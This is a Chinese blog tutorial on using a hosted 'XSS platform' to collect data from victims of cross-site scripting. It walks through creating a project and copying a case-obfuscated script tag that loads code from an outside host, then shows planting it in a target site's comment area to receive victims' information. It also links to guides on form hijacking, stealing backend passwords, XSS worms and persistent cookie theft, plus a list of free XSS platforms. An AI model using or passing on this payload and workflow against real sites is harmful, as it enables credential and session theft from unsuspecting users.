A-A+

Xss平台详细使用教程

2018年01月03日 19:42 学习笔记 评论 1 条 阅读 74 views 次

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

首先登录XSS平台,进入 Xss平台之后是如下界面。  (以下所有图片点击都可以查看大图或原图)

XSS平台登陆后界面

XSS平台登陆后界面

登录进去后,首先要创建一个项目。这个项目主要是为了标记你想测试某个网站。如下图:

创建XSS平台项目

创建XSS平台项目

点击创建项目之后如下图:

创建项目第一步(注意看图中内容)

创建项目第一步(注意看图方框中内容)

然后点击下一步。然后配置项目:

配置项目功能

配置项目功能(这里如果不懂建议只勾选“默认模块”)

这里不要太多模块都勾选,非常非常容易导致JS报错,如果报错,那么可能你就收不到对方的中招信息了。尽量只勾选一个或两个。

然后点击下一步,就完成了。完成后如下图:

创建项目成功后会给出项目代码

创建项目成功后会给出项目代码

这里说明一下,注意上方的红框,这里最好是复制上方第一个红色方框中的内容,例如:

<sCRiPt sRC=//xyl.life/xxxx></sCrIpT>  这个就是项目给你的代码,这里说一下你需要测试的网站是https的网站且你的XSS平台也支持https那么你可以把这个代码改成 <sCRiPt sRC=https://xyl.life/xxxx></sCrIpT> 这样。

 

这里还要说明一下,其实 <sCRiPt sRC=//xyl.life/xxxx></sCrIpT> 当网站前面是//的时候,代码会自动适配网站,如果对方网站是https的那么代码会自动从https加载,如果对方网站是http的那么代码会从http加载。所以,,,默认的这种方式是最好的插入方式。(xss平台不需要支持https,xss项目代码支持https就好,这句话自行理解)

 

如何从其他地方查看上面的项目代码呢?如下图:

查看项目代码方法

查看项目代码方法

至此最基本的XSS平台项目及使用方法建立完毕了,剩下就是拿你自己的项目代码来做测试喽。例如上面我项目对应的代码是:<sCRiPt sRC=//xsspt.com/xxxx></sCrIpT>

假设我想测试留言的地方就可以如下图:

测试留言区(不光可以测试这里,更多地方发挥你的想象)

测试留言区(不光可以测试这里,更多地方发挥你的想象)

然后如果对方中招了,那么你的XSS平台就会有收到对方的信息。好了,这是最基本的使用方法。

 

下面是本人整理的一些XSS平台进阶的使用方法:

图片XSS 获取对方后台 使用讲解    http://coao.co/1785.html

XSS 之 form表单劫持(通用明文记录)    http://coao.co/1684.html (这里推荐使用平台最新表单劫持插件,无需设置,直接可用)

xss获取后台二级密码 – URL跳转 (地址栏不变)    http://coao.co/1820.html

后台(内网)打穿神器→xss蠕虫    http://coao.co/2173.html

xss平台持久cookie说明 keepsession说明    http://coao.co/1907.html

 

--------------------------XSS经典案例之一----------------------

百度搜索框反射XSS分析 (2015年案例)    http://coao.co/2089.html

一波三折之某站点反射XSS (绕WAF防御)    http://coao.co/1603.html

京东驳回的一枚轻易paylod而不易exploit的xss的开发过程    http://coao.co/1590.html

 

网络上免费XSS平台集合:https://sec.ly.com/xsspt.txt     这里全部都是网络上公开的,不公开的,免费的收费的XSS平台集合,任君选择。

 

http://coao.co/liuyan/

标签:

1 条留言  访客:1 条  博主:0 条

  1. 蜗牛也很牛

    可以注册个帐号吗 想多学习学习

给我留言